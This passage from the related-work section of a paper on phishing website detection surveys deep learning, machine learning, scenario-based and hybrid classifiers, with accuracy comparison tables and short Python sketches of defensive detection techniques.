Previous work on phishing attack detection has focused on one or more techniques to improve accuracy; however, accuracy can be further improved by feature reduction and by using an ensemble model. Existing work on phishing attack detection can be placed in four categories:

Deep learning for phishing attack detection

Machine learning for phishing attack detection

Scenario-based phishing attack detection

Hybrid learning based Phishing attack detection

Deep learning (DL) for phishing attack detection

This section describes DL-based intrusion detection approaches. Recent advances in DL suggest that classifying phishing websites with deep neural networks (NN) should outperform traditional Machine Learning (ML) algorithms. However, the results of deep NNs depend heavily on the setting of different learning parameters [ 61 ]. Multiple DL approaches are used for cybersecurity intrusion detection [ 25 ], namely, (1) deep neural-network, (2) feed-forward deep neural-network, (3) recurrent neural-network, (4) convolutional neural-network, (5) restricted Boltzmann machine, (6) deep belief network, (7) deep auto-encoder. Figure 5 shows the working of deep learning models. A batch of input data is fed to the neurons, which apply weights to it to predict whether the input is a phishing attack or legitimate traffic.
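As a rough illustration of how a batch of inputs passes through weighted neurons to yield a phishing or legitimate prediction, the sketch below implements the forward pass of a tiny feed-forward network in plain Python. The layer sizes, the random untrained weights, the 0.5 decision threshold, and the four binary input features are all assumptions made for the example; a real model would learn its weights from labeled data.

```python
import math
import random


def relu(x: float) -> float:
    return max(0.0, x)


def sigmoid(x: float) -> float:
    return 1.0 / (1.0 + math.exp(-x))


def dense(inputs, weights, biases, activation):
    """One fully connected layer: activation(w . x + b) for each neuron."""
    return [
        activation(sum(w * x for w, x in zip(neuron_w, inputs)) + b)
        for neuron_w, b in zip(weights, biases)
    ]


def predict(features, params) -> float:
    """Forward pass: hidden ReLU layer, then a single sigmoid output neuron."""
    hidden = dense(features, params["w1"], params["b1"], relu)
    (score,) = dense(hidden, params["w2"], params["b2"], sigmoid)
    return score


# Hypothetical, untrained parameters (random weights, zero biases).
rng = random.Random(0)
n_in, n_hidden = 4, 3
params = {
    "w1": [[rng.uniform(-1, 1) for _ in range(n_in)] for _ in range(n_hidden)],
    "b1": [0.0] * n_hidden,
    "w2": [[rng.uniform(-1, 1) for _ in range(n_hidden)]],
    "b2": [0.0],
}

# A batch of two made-up feature vectors (e.g. binary URL or page indicators).
batch = [[1.0, 0.0, 1.0, 0.0], [0.0, 1.0, 0.0, 1.0]]
scores = [predict(x, params) for x in batch]
labels = ["phishing" if s >= 0.5 else "legitimate" for s in scores]
print(list(zip(scores, labels)))
```

Because the weights are untrained, the printed labels carry no meaning; the example only shows the data flow from inputs through weights to a score.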

Benavides et al. [ 15 ] combine each selected work with its classification. They characterize the DL algorithms chosen in every approach, finding that the most commonly used are the Deep Neural Network (DNN) and the Convolutional Neural Network (CNN). Diverse DL approaches have been presented and analyzed, but there remains a research gap in the use of DL algorithms for recognizing cyber-attacks.

Shie [ 55 ] examined different techniques and discussed different strategies for accurately recognizing phishing attacks. Of the evaluated strategies, DL techniques that use feature extraction show good performance because of their high accuracy and robustness. Classification models also show good performance. Maurya and Jain [ 46 ] proposed an anti-phishing framework that deploys a DL-based phishing detection model at the ISP level to ensure security at a vertical scale rather than through horizontal implementation. This approach adds an intermediate security layer at ISPs, placed between the various servers and end users. The efficiency of this framework lies in the fact that a single point of blocking can protect a large number of users from a specific phishing attack. The computational overhead of the phishing detection models is confined to ISPs, and end users receive secure service regardless of their system configurations, without needing powerful processing machines.

Authors in Subasi et al. [ 57 ] compared AdaBoost and multi boosting for detecting phishing websites. They used the UCI machine learning repository dataset, which has 11,055 instances and 30 features. AdaBoost and multi boost are the ensemble learners proposed in this research to improve the performance of phishing detection algorithms. Ensemble models improve the performance of the classifiers in terms of precision, F-measure, and ROC area. Experimental results reveal that, by utilizing ensemble models, it is possible to recognize phishing pages with a precision of 97.61%. Authors in Abdelhamid et al. [ 9 ] proposed a comparison based on model content and features. They used a dataset from PhishTank containing around 11,000 examples. They used an approach named enhanced dynamic rule induction (eDRI) and claimed that eDRI is the first ML and DL algorithm to have been applied to an anti-phishing tool. The algorithm passes over the dataset using two main thresholds, frequency and rule strength. Only the “strong” features of the training dataset are stored and become part of a rule, while the others are removed.
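The idea of keeping only “strong” features by means of a frequency threshold and a rule-strength threshold can be sketched as follows. This is an illustrative simplification and not the eDRI algorithm itself: the definitions of frequency (share of all rows covered by the rule) and strength (share of rows with that feature value that carry the rule's label), the threshold values, and the toy data are all assumptions.

```python
from collections import Counter

def strong_rules(rows, labels, min_freq=0.2, min_strength=0.8):
    """Return (feature, value, label, frequency, strength) for rules passing both thresholds."""
    total = len(rows)
    item_counts = Counter()   # how often feature=value occurs
    rule_counts = Counter()   # how often feature=value occurs together with a label
    for row, label in zip(rows, labels):
        for feature, value in row.items():
            item_counts[(feature, value)] += 1
            rule_counts[(feature, value, label)] += 1
    rules = []
    for (feature, value, label), n in rule_counts.items():
        freq = n / total
        strength = n / item_counts[(feature, value)]
        if freq >= min_freq and strength >= min_strength:
            rules.append((feature, value, label, freq, strength))
    return sorted(rules)

# Hypothetical toy data: two binary features per website.
ROWS = [
    {"has_ip": 1, "https": 0}, {"has_ip": 1, "https": 0}, {"has_ip": 1, "https": 1},
    {"has_ip": 0, "https": 1}, {"has_ip": 0, "https": 1}, {"has_ip": 0, "https": 0},
]
LABELS = ["phishing", "phishing", "phishing", "legitimate", "legitimate", "legitimate"]

for rule in strong_rules(ROWS, LABELS):
    print(rule)
```

In this toy data only the `has_ip` feature yields rules that pass both thresholds; the `https` feature is too weakly tied to either class and is dropped.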

Authors in Mao et al. [ 44 ] proposed a learning-based system that uses page layout similarity to distinguish phishing pages. They defined rules for effective page layout features and built a phishing page classifier with two conventional learning algorithms, SVM and DT. They tested the methodology on real web page samples from phishtank.com and alexa.com. Authors in Jain and Gupta [ 34 ] proposed techniques and performed experiments on five datasets: the first from Phishtank, containing 1528 phishing websites; the second from Openphish, containing 613 phishing websites; the third from Alexa, containing 1600 legitimate websites; the fourth from payment gateways, containing 66 legitimate websites; and the fifth from top banking websites, containing 252 legitimate websites. By applying machine-learning algorithms, they improved the accuracy of phishing detection. They used RF, SVM, Neural Networks (NN), LR, and NB, with a feature extraction approach on the client side.

Authors in Li et al. [ 42 ] proposed a novel approach in which a URL is taken as input and both URL-related and HTML-related features are extracted. After feature extraction, a stacking model is used to combine classifiers. They performed experiments on different datasets. The first was obtained from Phishtank, with 2000 web pages (1000 legitimate and 1000 phishing). The second is larger, with 49,947 web pages (30,873 legitimate and 19,074 phishing), and was taken from Alexa. They used SVM, NN, DT, and RF and combined these through stacking to achieve better accuracy. This research achieves good accuracy using different classifiers.
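Stacking, as used in the study above, trains a second-level (meta) learner on the outputs of the first-level classifiers. The sketch below shows the mechanism only. As an assumption made for brevity, the base classifiers are three hypothetical hand-written rules rather than SVM, NN, DT, and RF, and the meta-learner is a lookup table that maps each pattern of base outputs to the majority label seen in training.

```python
from collections import Counter, defaultdict

# Hypothetical base classifiers: each maps a page (dict) to 1 (phishing) or 0 (legitimate).
def url_rule(page):
    return 1 if page["url_length"] > 60 else 0

def html_rule(page):
    return 1 if page["external_form"] else 0

def host_rule(page):
    return 1 if page["has_ip"] else 0

BASE = [url_rule, html_rule, host_rule]

def base_outputs(page):
    return tuple(clf(page) for clf in BASE)

def fit_meta(pages, labels):
    """Meta-learner: majority label for each observed pattern of base outputs."""
    votes = defaultdict(Counter)
    for page, label in zip(pages, labels):
        votes[base_outputs(page)][label] += 1
    return {pattern: counts.most_common(1)[0][0] for pattern, counts in votes.items()}

def predict(meta, page):
    pattern = base_outputs(page)
    if pattern in meta:
        return meta[pattern]
    # Pattern never seen in training: fall back to a plain majority vote.
    return 1 if sum(pattern) * 2 > len(pattern) else 0

TRAIN_PAGES = [
    {"url_length": 80, "external_form": True, "has_ip": False},
    {"url_length": 75, "external_form": False, "has_ip": False},
    {"url_length": 30, "external_form": True, "has_ip": True},
    {"url_length": 20, "external_form": False, "has_ip": False},
    {"url_length": 90, "external_form": False, "has_ip": False},
]
TRAIN_LABELS = [1, 0, 1, 0, 0]
META = fit_meta(TRAIN_PAGES, TRAIN_LABELS)

# A long URL alone is not enough: the meta-learner has seen that pattern on legitimate pages.
print(predict(META, {"url_length": 70, "external_form": False, "has_ip": False}))
```

The point of the second level is visible in the last line: a single base rule fires, but the meta-learner has learned from the training data that this pattern is usually legitimate.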

Some studies are limited to a few classifiers, while others used many classifiers but their techniques were not efficient or accurate. Two datasets have been commonly used by researchers in the past; both are publicly accessible, from Phishtank and the UCI machine learning repository. ML techniques have been used without feature reduction, and some studies compared their results using only a few classifiers.

Machine learning (ML) for phishing attack detection

ML approaches are popular for phishing website detection, which they treat as a simple classification problem. To train an ML model for a learning-based detection system, the data at hand must have features that are related to the phishing and legitimate website classes. Different classifiers are used to detect a phishing attack. Previous studies show that detection accuracy is high when robust ML techniques are used. Several feature selection techniques are used to reduce the number of features. Figure 6 shows the working of the machine learning model. A batch of input data is given to the model for training, after which the model predicts whether traffic is a phishing attack or legitimate.

[Figure 6: Working of the machine learning model]

Reducing the number of features makes dataset visualization more efficient and understandable. The classifiers that were used most prominently in various studies and found to give good phishing attack detection accuracy are C4.5, k-NN, and SVM. Of these, the DT-based classifier C4.5 is reported to give the maximum accuracy and efficiency in detecting a phishing attack. Researchers have also mentioned the limitations of their work, which point to directions for further exploration. Many highlighted the common limitations that ensemble learning techniques were not used and that, in some studies, feature reduction was not done. Authors in James et al. [ 36 ] used different classifiers such as C4.5, IBK, NB, and SVM. Similarly, authors in Liew et al. [ 43 ] used RF to distinguish phishing attacks from original web pages. Authors in Adebowale et al. [ 10 ] used a robust scheme based on the Adaptive Neuro-Fuzzy Inference System with integrated features for phishing attack detection and protection.

Authors in Zamir et al. [ 65 ] presented an examination of supervised learning and stacking models to recognize phishing websites. The rationale behind these experiments was to improve the classification precision through the proposed features with PCA and the stacking of the most efficient classifiers. Stacking (RF, NN, bagging) outperformed other classifiers with the proposed features N1 and N2. The experiments were performed on a phishing websites dataset containing 32 pre-processed features and 11,055 websites. Authors in Alsariera et al. [ 13 ] used four meta-learner models, AdaBoost-Extra Tree (ABET), Bagging-Extra Tree (BET), Rotation Forest-Extra Tree (RoFBET), and LogitBoost-Extra Tree (LBET), all using the extra-tree base classifier. The proposed meta-algorithms were fitted to phishing website datasets and their performance was tested. The proposed models outperformed existing ML-based models in phishing attack recognition. The authors therefore suggest the adoption of meta-algorithms when building phishing attack identification models.

Authors in El Aassal et al. [ 22 ] proposed a benchmarking framework called PhishBench, which makes it possible to assess and compare existing features for phishing detection under identical experimental conditions, i.e., a unified system specification, datasets, classifiers, and performance metrics. The experiments indicated that classification performance dropped as the ratio of phishing to legitimate samples decreased towards 1 to 10. The drop in performance ranged from 5.9 to 42% in F1-score. Furthermore, PhishBench was also used to test past techniques on new and diverse datasets.
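Why the F1-score falls as legitimate samples come to outnumber phishing samples can be seen from a short worked calculation. The detection rates below (95% true-positive rate, 5% false-positive rate) and the sample counts are hypothetical and are not PhishBench results; the sketch only shows the arithmetic behind the effect.

```python
def f1_at_ratio(n_phish, n_legit, tpr, fpr):
    """F1-score of a classifier with fixed per-class rates on a given class mix."""
    tp = tpr * n_phish          # phishing pages correctly flagged
    fp = fpr * n_legit          # legitimate pages wrongly flagged
    fn = n_phish - tp           # phishing pages missed
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    return 2 * precision * recall / (precision + recall)

# Same classifier, two class mixes (assumed values for illustration).
balanced = f1_at_ratio(1000, 1000, tpr=0.95, fpr=0.05)    # ratio 1:1
skewed = f1_at_ratio(1000, 10000, tpr=0.95, fpr=0.05)     # ratio 1:10

print(round(balanced, 3), round(skewed, 3))
```

Under these assumptions the F1-score drops from 0.95 at a 1:1 ratio to about 0.776 at 1:10, because the same false-positive rate applied to ten times as many legitimate pages produces ten times as many false alarms and pulls precision down.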

Authors in Subasi and Kremic [ 56 ] proposed an intelligent phishing website identification system. They utilized different ML models to classify websites as genuine or phishing. Several classification methods were used to implement an accurate and smart phishing website detection structure. ROC area, F-measure, and AUC were used to assess the performance of the ML techniques. Results demonstrated that Adaboost with SVM performed best among all classification techniques, achieving the highest accuracy of 97.61%. Authors in Ali and Malebary [ 12 ] proposed a phishing website detection technique that uses Particle Swarm Optimization (PSO) based feature weighting to improve the detection of phishing websites. Their approach uses PSO to weight the different website features, effectively achieving higher accuracy when distinguishing phishing websites. In particular, the proposed PSO-based feature weighting differentiates between website features according to how significantly they contribute towards distinguishing phishing from real websites. Results showed that the ML models improved with the proposed PSO-based feature weighting and could effectively distinguish phishing from real websites.

Authors in James et al. [ 36 ] used datasets from Alexa and Phishtank. Their proposed approach reads the URLs one by one and analyzes the host name and path of each URL to classify it as an attack or as legitimate activity using four classifiers: NB, DT, KNN, and Support Vector Machine (SVM). Authors in Subasi et al. [ 57 ] used Artificial Neural Network (ANN), KNN, SVM, RF, Rotation Forest, and C4.5. They discussed in detail how accurate these classifiers are in detecting a phishing attack. They claim that the accuracy of the RF is not more than 97.26%. All other classifiers got the same accuracy as given in the study. Authors in Hutchinson et al. [ 31 ] proposed a study on phishing website detection focusing on feature selection. They used the UCI machine learning repository dataset, which contains 11,055 URLs and 30 features, and divided these features into six groups. They selected three groups and concluded that these groups are suitable options for accurate phishing attack detection.
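The first step described for James et al. above, splitting each URL into host name and path before classification, can be sketched with the Python standard library. The particular features computed here (dot count, IPv4-like host, path depth, URL length) are assumptions chosen for illustration and are not the feature set of any cited study.

```python
from urllib.parse import urlsplit

def url_features(url: str) -> dict:
    """Split a URL into host and path and derive a few simple lexical features."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    return {
        "host": host,
        "path": parts.path,
        "host_dots": host.count("."),
        # True when the host consists only of digits and dots, e.g. a raw IPv4 address
        "host_is_ipv4_like": host.replace(".", "").isdigit(),
        "path_depth": len([seg for seg in parts.path.split("/") if seg]),
        "url_length": len(url),
    }

features = url_features("http://192.0.2.10/secure/login/update.php")
print(features)
```

A feature dictionary of this kind would then be turned into a numeric vector and passed to a classifier such as NB, DT, KNN, or SVM.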

Authors in Abdelhamid et al. [ 9 ] created a method called Enhanced Dynamic Rule Induction (eDRI) to detect phishing attacks. They used feature extraction, the Remove Replace Feature Selection Technique (RRFST), and ANOVA to reduce features. The results show an accuracy of 93.5%, which they report as the highest in comparison with other studies. The study in [ 29 ] proposed a feature selection technique named Remove Replace Feature Selection Technique (RRFST). The authors state that they obtained the phishing email dataset, containing 47 features, from the khoonji’s anti-phishing website. The DT was used to predict the performance measures.

Authors in Tyagi et al. [ 58 ] used a dataset from the UCI machine learning repository that contains 2456 unique URL instances and a total of 11,055 URLs, of which 6157 are phishing websites and 4898 are legitimate websites. They extracted 30 URL features and used them to predict the phishing attack. There were two possible outcomes: either the user is notified that the website is a phishing site, or the user is informed that the website is safe. They used ML algorithms such as DT, RF, Gradient Boosting (GBM), Generalized Linear Model (GLM), and PCA. The authors in Chen and Chen [ 17 ] used the SMOTE method, which improves the detection coverage of the model. They trained machine learning models including bagging, RF, and XGboost, and achieved their highest accuracy with XGboost. They used a Phishtank dataset that has 24,471 phishing websites and 3850 legitimate websites.
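SMOTE, mentioned above for Chen and Chen, balances a skewed dataset by creating synthetic minority-class samples on the line segment between a minority sample and one of its nearest minority neighbours. The following is a minimal sketch of that interpolation step, not the authors' implementation; the parameter values and the toy points are assumptions, and at least two minority samples are required.

```python
import random

def smote(minority, n_new, k=2, seed=0):
    """Generate n_new synthetic points by interpolating between minority neighbours."""
    rng = random.Random(seed)
    synthetic = []
    for _ in range(n_new):
        base = rng.choice(minority)
        # k nearest minority neighbours of the chosen sample (excluding the sample itself)
        neighbours = sorted(
            (p for p in minority if p is not base),
            key=lambda p: sum((a - b) ** 2 for a, b in zip(p, base)),
        )[:k]
        other = rng.choice(neighbours)
        gap = rng.random()  # position along the segment from base to other
        synthetic.append([a + gap * (b - a) for a, b in zip(base, other)])
    return synthetic

# Hypothetical minority-class feature vectors.
MINORITY = [[0.0, 0.0], [1.0, 0.0], [0.0, 1.0]]
new_points = smote(MINORITY, n_new=5)
print(new_points)
```

Every synthetic point lies between two existing minority samples, so the minority class is enlarged without simply duplicating rows.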

Authors in Joshi et al. [ 39 ] used an RF algorithm as a binary classifier and the reliefF algorithm for feature selection. They used a dataset from the Mendeley website, which is given as input to the feature selection algorithm to select efficient features. Next, they trained an RF algorithm on the selected features to predict the phishing attack. Authors in Ubing et al. [ 59 ] based their work on ensemble learning, using three techniques: bagging, boosting, and stacking. Their dataset, taken from UCI and publicly accessible, contains 30 features with a result column and 5126 records. They combined their classifiers to acquire the maximum accuracy, which they got from a DT. Authors in Mao et al. [ 45 ] used different machine learning classifiers, including SVM, DT, AdaBoost, and RF, to predict the phishing attack. Authors in Sahingoz et al. [ 54 ] created their own dataset because, as they mentioned, Phishtank does not provide a free dataset on its web page. The dataset contains 73,575 URLs, of which 36,400 are legitimate and 37,175 are phishing. They used seven classification algorithms and natural language processing (NLP) based features for phishing attack detection.

Table 1 presents the summary of ML approaches for phishing websites detection. The table shows that some studies provide highly efficient results for phishing attack detection.

Table 1 ML approaches for phishing websites detection

Authors	Classification method	Feature selection method	Accuracy (%)
James et al. [ 36 ]	J48, IBK, SVM, NB	–	89.75
Abdelhamid et al. [ 9 ]	eDRI	–	93.5
Mao et al. [ 45 ]	SVM, RF, DT, AB	–	97.31
Jain and Gupta [ 34 ]	–	Feature extraction	99.09
Hota et al. [ 29 ]	CART, C4.5	RRFST	99.11
Ubing et al. [ 59 ]	EL	–	95.4
Chen and Chen [ 17 ]	ELM, SVM, LR, C4.5, LC-ELM, KNN, XGB	ANOVA	99.2

In this section, we provide a comparison of scenario-based phishing attack detection used by various researchers. The comparison of scenario-based techniques to detect a phishing attack is shown in Table 2. Studies show that different scenarios were handled with various methods and provide different outcomes.

Table 2 Comparison of scenario-based studies

Authors	Scenarios	Method	Accuracy
Yao et al. [ 63 ]	Identity detection process	Logo extraction	98.3%
Curtis et al. [ 21 ]	Dark triad attacker’s concept	Dark triad	–
Williams et al. [ 62 ]	62,000 employees over 6 weeks of observation	Theoretical approaches	–
Parsons et al. [ 52 ]	Worked on 985 participants	ANOVA	–

Authors in Begum and Badugu [ 14 ] discussed some approaches that are useful for detecting a phishing attack. They performed a detailed survey of existing techniques, such as Machine Learning (ML) based approaches, non-machine-learning-based approaches, neural-network-based approaches, and behavior-based detection approaches. Authors in Yasin et al. [ 64 ] consolidated various studies that researchers have used to explain the different activities of social engineers. Moreover, they proposed that a better understanding of social engineering attack scenarios would be possible using thematic and game-based analysis techniques. The proposed strategy for interpreting social engineering attack scenarios is one such attempt to enable people to understand general attack scenarios. Even though the initial results were neutral, the theoretically consistent framework of this strategy still merits future extension and re-evaluation.

Authors in Fatima et al. [ 23 ] presented PhishI as a systematic way to design serious games for security training. They define a game design framework that incorporates the body of knowledge on social engineering and that needs authoritative players. They used spear phishing as an example to show how the proposed approach works, and then evaluated the learning effects of the resulting game based on empirical data collected from the students’ activity. In the PhishI game, participants are required to exchange phishing emails and have the option to comment on the effectiveness of the attack scenario. Results demonstrated that students’ awareness of spear-phishing risks is improved and that their resistance to the first potential attack is enhanced. Moreover, the game had a positive effect on participants’ understanding of excessive online information disclosure.

Authors in Chiew et al. [ 18 ] studied phishing attacks in detail in terms of the medium and vector in which they live and their technical approaches. They believe this information will help the general public take precautionary and preventive actions against these phishing attacks and will support the implementation of policies to curb any further misuse by phishers. Relying on user education alone as a preventive measure against phishing is not sufficient. Their survey shows that the development of intelligent systems to counter these technical approaches is required, as such countermeasures will be able to recognize and disable both existing attacks and new phishing threats.

Authors in Yao et al. [ 63 ] used a logo extraction method together with an identity detection process to detect phishing. Two non-overlapping datasets were made from a total of 726 pages. The phishing pages are from the PhishTank website and the legitimate pages are from the Alexa website. They limited their work by not using DL techniques. Authors in Curtis et al. [ 21 ] introduced the concept of dark triad attackers. Phishing effort and performance, and end users’ arrangement of emails, form the theoretical approach of the dark triad method. A limitation of their work is that the end-user participants may have been hyper-aware of potential deception and therefore more cautious in their ratings of each email than they would be in their normal workplace. Authors in Williams et al. [ 62 ] used a mixed approach to detect a phishing attack. They used ensemble learning to investigate 62,000 instances over a six-week time frame to detect targeted phishing messages, called spear phishing. A drawback is that they took information from only two organizations, so employee perceptions and experiences are likely to be affected by a range of factors that may be specific to the organizations considered.

Authors in Parsons et al. [ 52 ] used the ANOVA method. In a scenario-based phishing study, a total of 985 participants completed a role-play. A two-way repeated-measures analysis of variance (ANOVA) was conducted to assess the effect of email legitimacy and of email influence, which was the focus of the study. The study included only one phishing and one genuine email for each of the influence principles and did not test the effect of multiple principles within an email. The following is a comparison of studies that use RF, the classifier most used by researchers.

Table 3 provides a comparison of RF classifiers with different datasets and different approaches. Some studies reduced features without much impact on accuracy, and the remaining studies focused on accuracy. Authors in Subasi et al. [ 57 ] used different classifiers to detect phishing attacks and achieved an accuracy of 97.36% with the RF algorithm.

Authors	Classification method	Feature selection method	Accuracy (%)
Subasi et al. [ 57 ]	ANN, KNN, SVM, RF, Rotation Forest, C4.5	–	97.36
Tyagi et al. [ 58 ]	DT, RF, GBM	PCA	98.4
Mao et al. [ 45 ]	SVM, RF, DT, AB	–	97.31
Jagadeesan et al. [ 33 ]	RF, SVM	–	95.11
Joshi et al. [ 39 ]	RF, RA	RA	97.63
Sahingoz et al. [ 54 ]	SVM, DT, RF, KNN, KS, NB	NLP	97.98

Authors in Tyagi et al. [ 58 ] used 30 features to detect the attack with RF. They used other classifiers as well, but their RF result was better than those of the other classifiers. Similarly, authors in Mao et al. [ 45 ] collected a dataset of 49 phishing websites from PhishTank.com. They used four learning classifiers to detect phishing attacks and concluded that the RF classifier performs much better than the others. Authors in Jagadeesan et al. [ 33 ] used two datasets. The first, from the UCI Machine Learning Repository, has 30 features and one target class and contains 2456 instances of phishing and non-phishing URLs. The second comprises 1353 URLs with 10 features, grouped into 3 classes: phishing, non-phishing, and suspicious. They concluded that RF provides better accuracy than SVM. Authors in Joshi et al. [ 39 ] used a publicly accessible dataset from the Mendeley website. The dataset contains 5000 legitimate and 5000 phishing records. Authors in Sahingoz et al. [ 54 ] used the Ebbu2017 Phishing Dataset containing 73,575 URLs, of which 36,400 are legitimate and 37,175 are phishing. They proposed seven different classification algorithms with Natural Language Processing (NLP) based features. The dataset they used is not commonly used for detecting phishing attacks.

Authors in Williams et al. [ 62 ] conducted two studies considering different aspects of emails. The email that is received, the person who receives it, and the context of the email were all studied as theoretical approaches in this paper. They believe that the study will pave the way for theoretical development in this field. They considered 62,000 employees over 6 weeks and observed the individuals and the targeted phishing emails, known as spear phishing. Authors in Parsons et al. [ 52 ] worked with 985 participants who completed a role-play in a scenario-based phishing study. They used a two-way repeated-measures analysis of variance (ANOVA) to assess the effect of email legitimacy and email influence. The email used in their research indicates that the recipient has previously donated to a charity.

Authors in Yao et al. [ 63 ] proposed a methodology that mainly includes two processes: logo extraction and identity detection. In the logo extraction process, the logo is extracted from the image of the two-dimensional code after image processing. Next, the identity detection process assesses the relationship between the actual identity of the website and its described identity. If the described identity matches the actual identity, the website is legitimate; otherwise, it is a phishing website. They created two non-overlapping datasets from 726 web pages, containing phishing and legitimate web pages. The legitimate pages are taken from Alexa, whereas the phishing pages are taken from Phishtank. They believe that logo extraction can be improved in the future. Authors in Curtis et al. [ 21 ] introduced the dark triad attacker’s concept. They used a dark triad score obtained by completing the 27-item Short Dark Triad with both attackers. The end users were asked to participate in the scenario to assign scores based on psychopathy, narcissism, and Machiavellianism.
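The identity detection step described for Yao et al. above compares the identity a page claims (for example, through its logo) with the identity its URL actually has. A minimal sketch of that comparison follows. It assumes that logo recognition has already produced a brand name; the brand-to-domain table and all domain names are hypothetical, and the two-label domain extraction is a deliberate simplification.

```python
from urllib.parse import urlsplit

# Hypothetical mapping from a brand recognised in the page logo to its genuine domains.
BRAND_DOMAINS = {
    "examplebank": {"examplebank.com"},
    "examplepay": {"examplepay.com", "examplepay.net"},
}

def registered_domain(url: str) -> str:
    """Naive last-two-labels domain; production code would consult the Public Suffix List."""
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])

def classify(url: str, logo_brand: str) -> str:
    """Compare the described identity (logo brand) with the actual identity (URL domain)."""
    genuine = BRAND_DOMAINS.get(logo_brand.lower())
    if genuine is None:
        return "unknown"
    return "legitimate" if registered_domain(url) in genuine else "phishing"

print(classify("https://www.examplebank.com/login", "ExampleBank"))
print(classify("http://examplebank.com.evil.example/login", "ExampleBank"))
```

The second call shows the typical phishing pattern: the brand name appears in the host, but the registered domain belongs to someone else, so the described and actual identities disagree.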

Hybrid learning (HL) based phishing attack detection

In this section, we present the comparison of HL models used by state-of-the-art studies, as shown in Tables 4 and 5. The studies show how accuracy was improved by ensemble and HL techniques.

Table 4 Comparison of hybrid methods used in state-of-the-art

Authors	Classification method	Accuracy (%)
Patil et al. [ 53 ]	LR, DT, RF	96.58
Niranjan et al. [ 48 ]	RC, KNN, IBK, LR, PART	97.3
Chiew et al. [ 19 ]	RF, C4.5, PART, SVM, NB	96.17
Pandey et al. [ 50 ]	RF, SVM	94

Table 5 Comparison table of state-of-the-art studies focusing on phishing techniques

Authors	Classification	Feature selection technique	Accuracy
James et al. [ 36 ]	J48, IBK, SVM, NB	–	89.75%
Subasi et al. [ 57 ]	ANN, kNN, SVM, RF, Rotation Forest, C4.5	–	97.36%
Abdelhamid et al. [ 9 ]	eDRI	–	93.5%
Mao et al. [ 44 ]	SVM, DT	–	93%
Jain and Gupta [ 34 ]	–	–	99.09%
Yao et al. [ 63 ]	–	–	98.3%
Patil et al. [ 53 ]	LR, DT, RF	–	96.58%
Jagadeesan et al. [ 33 ]	RF, SVM	–	95.11%
Hota et al. [ 29 ]	CART, C4.5	RRFST	99.11%
Tyagi et al. [ 58 ]	DT, RF, GBM	PCA	98.40%
Curtis et al. [ 21 ]	–	–	–
Sahingoz et al. [ 54 ]	SVM, DT, RF, kNN, KS, NB	NLP	97.98%
Parsons et al. [ 52 ]	–	–	–
Joshi et al. [ 39 ]	RF, RA	RA	97.63%
Ubing et al. [ 59 ]	EL	–	95.4%
Mao et al. [ 45 ]	SVM, RF, DT, AB	–	97.31%
Williams et al. [ 62 ]	–	–	–
Niranjan et al. [ 48 ]	RC, kNN, IBK, LR, PART	–	97.3%
Chen and Chen [ 17 ]	ELM, SVM, LR, C4.5, LC-ELM, kNN, XGB	ANOVA	99.2%
Chiew et al. [ 19 ]	RF, C4.5, PART, SVM, NB	–	96.17%
Pandey et al. [ 50 ]	SVM, RF	–	94%

Authors in Kumar et al. [ 41 ] separated some irrelevant features from the content and pictures and applied SVM as a binary classifier. They classify real and phishing messages with techniques such as text parsing, word tokenization, and stop-word removal. The authors in Jain et al. [ 35 ] used TF-IDF to find the most significant features of the website for use in the search query, with TF-IDF adjusted to improve performance. The proposed approach was found to be more accurate than existing techniques that use the traditional TF-IDF approach.
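How TF-IDF surfaces the most significant terms of a page for use in a search query can be shown with a short, dependency-free sketch. It implements the traditional TF-IDF formula (term frequency times the logarithm of the inverse document frequency), not the adjusted variant of Jain et al.; the three toy documents and the whitespace tokenization are assumptions.

```python
import math
from collections import Counter

def tf_idf(docs):
    """Return one {term: score} dict per document using plain TF-IDF."""
    tokenised = [doc.lower().split() for doc in docs]
    n_docs = len(tokenised)
    # Document frequency: in how many documents each term appears
    df = Counter(term for tokens in tokenised for term in set(tokens))
    scores = []
    for tokens in tokenised:
        tf = Counter(tokens)
        scores.append({t: (c / len(tokens)) * math.log(n_docs / df[t])
                       for t, c in tf.items()})
    return scores

def top_terms(score, n=2):
    """Highest-scoring terms; ties are broken alphabetically."""
    return [t for t, _ in sorted(score.items(), key=lambda kv: (-kv[1], kv[0]))[:n]]

# Hypothetical page texts; the first one is the page under inspection.
DOCS = [
    "examplebank login verify your account examplebank",
    "weather news and your local sports",
    "login to read news",
]
query_terms = top_terms(tf_idf(DOCS)[0])
print(query_terms)
```

Terms that are frequent on the inspected page but rare elsewhere, such as the brand name, rise to the top and become the search query; common words such as "login" score low because they appear in other documents as well.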

Authors in Adebowale et al. [ 10 ] proposed a hybrid approach comprising Search and Heuristic Rule and Logistic Regression (SHLR) for efficient phishing attack detection. The authors proposed a three-step approach: (1) a web page is considered legitimate if its domain matches the domain name of the websites retrieved in the results of a search query, since most websites shown in search results are legitimate; (2) heuristic rules defined by character features are applied; and (3) an ML model predicts whether the web page is legitimate or a phishing attack. Authors in Patil et al. [ 53 ] used LR, DT, and RF techniques to detect a phishing attack, and they believe that RF is a much-improved way to detect the attack. The drawback of this system is that it produces a small number of false-positive and false-negative results. Authors in Niranjan et al. [ 48 ] used the UCI phishing dataset containing 6157 legitimate and 4898 phishing instances out of a total of 11,055 instances. They used the EKRV model, which combines KNN and random committee techniques. Authors in Chiew et al. [ 19 ] used a dataset of 5000 phishing web pages based on URLs from PhishTank and OpenPhish, and another 5000 legitimate web pages based on URLs from Alexa and the Common Crawl archive. They used a Hybrid Ensemble Strategy. Authors in Pandey et al. [ 50 ] used the Website Phishing dataset, available online in a repository of the University of California. This dataset has 10 features and 1353 instances. They trained an RF-SVM hybrid model that achieved an accuracy of 94%.
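The three-step SHLR idea described at the start of the paragraph above (search check, heuristic rules, then logistic regression) can be chained as in the sketch below. This is one possible reading of the steps, not the published implementation: the search results are passed in as a plain list instead of coming from a search engine, and the two heuristic rules, the three features, and the logistic-regression weights are hypothetical.

```python
import math
from urllib.parse import urlsplit

def domain(url: str) -> str:
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host

def shlr(url, search_results, weights=(1.0, 0.8, 0.3), bias=-2.5):
    page_domain = domain(url)
    # Step 1: search check. A page whose domain appears in the search results is accepted.
    if any(domain(result) == page_domain for result in search_results):
        return "legitimate"
    # Step 2: heuristic rules on URL characters (assumed rules: '@' in URL, raw IP host).
    if "@" in url or page_domain.replace(".", "").isdigit():
        return "phishing"
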